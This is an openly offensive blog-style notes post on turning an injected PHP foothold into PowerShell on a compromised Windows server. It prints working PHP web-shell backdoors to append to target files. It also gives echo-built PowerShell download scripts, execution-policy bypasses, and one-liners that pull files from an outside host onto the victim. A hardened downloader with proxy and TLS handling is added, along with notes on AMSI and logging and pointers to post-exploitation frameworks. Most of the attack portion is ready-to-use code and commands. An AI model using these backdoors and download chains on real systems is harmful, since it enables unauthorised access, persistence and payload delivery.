
From SHELL to POWERSHELL

Just keeping this for my notes and reference, because sometimes it is hard to recall the #HowTo.

See 'clam' for more and `bash' for a shell script!


            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
       `.`.\\|//.'.'
        |`._`n'_.'|  hjw
        "----^----"

OK, let's assume we are able to inject some malicious payload or code into the target, for example through phpMyAdmin, SQL injection, RCE or whatever other low-hanging fruit is present.

1. For PHP these are the useful snippets:
========
PHP Info
========

<?php phpinfo(); ?>

Use the full <?php tag; the short <? form only works when short_open_tag is enabled. The output is useful for identifying the document root, file paths, loaded modules, disable_functions and so on.

================
Simple PHP Backdoor
================

<?php system($_GET['cmd']); ?>

or

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

The second one is the 'cleanest' version: it only runs when a cmd parameter is present (GET or POST), wraps the output in <pre> so it stays readable, and die stops the rest of the page from rendering. Both fit on one line, so we can simply append them to another file of our choosing. If system() is listed in disable_functions (check phpinfo), the same one-liner works with shell_exec(), passthru() or proc_open(), whichever is not blocked.

2. How we escalate privileges depends on the target platform: Windows and Linux need different methods.

If the target is running Windows we can use PowerShell, which is installed by default on every supported Windows version. Historically some anti-virus products paid little attention to commands executed through PowerShell; since PowerShell 5 on Windows 10, AMSI hands script content to the installed AV and script block logging records it, so do not count on that blind spot.

Older Windows builds have no wget or curl command to fetch files from an external host (curl.exe only ships from Windows 10 1803 / Server 2019 onwards, and inside PowerShell wget and curl are merely aliases for Invoke-WebRequest). To do the same thing with the shell we appended earlier, we can use the echo command to write a small PowerShell download script.

First we create a new file called download.ps1:
================
Copy & Execute This
================

echo param($url, $filename) > download.ps1
echo $client = new-object System.Net.WebClient >> download.ps1
echo $client.DownloadFile( $url, $filename); >> download.ps1

These are cmd.exe echo commands (system() on Windows runs the command through cmd /c), so the text after echo is written literally; do not run them from a PowerShell prompt, where $url and $filename would be expanded to empty strings. When sent through the PHP backdoor's cmd parameter, the spaces, > and any & must be URL-encoded (%20, %3E, %26) or the query string will be mangled. The resulting file should contain exactly the three lines we echoed:

$ type download.ps1

param($url, $filename)
$client = new-object System.Net.WebClient
$client.DownloadFile( $url, $filename);

Next run this command:

$ powershell Set-ExecutionPolicy Unrestricted

This removes the execution-policy restriction on scripts. Without -Scope it changes the LocalMachine policy, which needs an administrative shell and leaves a registry change behind; as an unprivileged user add -Scope CurrentUser, or skip this step entirely, since the next command sets the policy for that one process anyway.

$ powershell -ExecutionPolicy RemoteSigned -File "download.ps1" "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"

This is the command we actually want. RemoteSigned is enough here because a file created locally with echo carries no Mark-of-the-Web; -ExecutionPolicy Bypass works just as well. Make sure both the URL and the destination path are right before executing it, and pick a directory the web server's service account can write to.
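The download script the steps above build, extended as an added example (my code, not the original post's): it keeps the same positional param contract, forces TLS 1.2, goes through the system proxy, reports failures instead of silently writing nothing, and optionally checks a SHA256 hash. The function name Invoke-FileDownload, the -Sha256 parameter and the host somewhere.com are assumptions for illustration; Get-FileHash needs PowerShell 4 or later.

```powershell
# Added example (not from the original post): a more defensive download.ps1.
# Assumptions: the URL http://somewhere.com/filename.ext and the destination
# C:\Windows\Temp\filename.ext are the post's placeholders; Invoke-FileDownload
# and the optional -Sha256 check are illustrative additions.
param(
    [Parameter(Mandatory = $true)][string]$Url,
    [Parameter(Mandatory = $true)][string]$Filename,
    [string]$Sha256 = ''   # optional expected hash, catches a truncated or tampered download
)

function Invoke-FileDownload {
    param([string]$Url, [string]$Filename, [string]$Sha256)

    # Old hosts default to TLS 1.0; a modern HTTPS endpoint will refuse the handshake.
    try {
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    }
    catch {
        Write-Warning "TLS 1.2 not available on this .NET build; continuing with defaults"
    }

    $client = New-Object System.Net.WebClient
    # Corporate boxes frequently have no direct egress: use the system proxy
    # with the current account's credentials.
    $client.Proxy = [Net.WebRequest]::GetSystemWebProxy()
    $client.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials

    try {
        $client.DownloadFile($Url, $Filename)
    }
    catch {
        Write-Error "Download of $Url failed: $($_.Exception.Message)"
        return $false
    }

    if (-not (Test-Path -LiteralPath $Filename)) {
        Write-Error "Nothing written to $Filename"
        return $false
    }
    $size = (Get-Item -LiteralPath $Filename).Length
    Write-Host "Wrote $size bytes to $Filename"

    if ($Sha256) {
        $actual = (Get-FileHash -LiteralPath $Filename -Algorithm SHA256).Hash
        if ($actual -ne $Sha256.ToUpper()) {
            Write-Error "SHA256 mismatch: expected $Sha256, got $actual"
            return $false
        }
    }
    return $true
}

Invoke-FileDownload -Url $Url -Filename $Filename -Sha256 $Sha256

# Invocation from the cmd.exe prompt behind the webshell. -NoProfile and
# -ExecutionPolicy Bypass make the separate Set-ExecutionPolicy step unnecessary:
#   powershell -NoProfile -ExecutionPolicy Bypass -File download.ps1 "http://somewhere.com/filename.ext" "C:\Windows\Temp\filename.ext"
# Equivalent one-liner that writes no script file to disk at all:
#   powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object Net.WebClient).DownloadFile('http://somewhere.com/filename.ext','C:\Windows\Temp\filename.ext')"
```

The one-liner in the trailing comment is usually the faster route when the webshell is the only channel, since it avoids the three echo commands and their URL-encoding entirely; the script form pays off when you need the proxy, TLS and hash handling above. Either way the PowerShell command line itself is what AMSI and script block logging will record on a PowerShell 5 host.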

Another thing I had been wondering about: is there a webshell written in PowerShell? Yes, there is. After some Googling I found Antak-WebShell (part of the Nishang framework). It is written in ASP.NET, so it does not work on a PHP-only host :( but if you get lucky, some IIS servers run both PHP and ASP.NET, and that is where it comes in.


With this webshell in place we can move on to tools like Empire, PowerSploit or Nishang for post-exploitation.

In conclusion, this step-by-step walkthrough may be painful and you might get stuck along the way. Maybe you have a better technique to simplify it? Anyway, good luck with spawning the $HELL. Cheers!!!


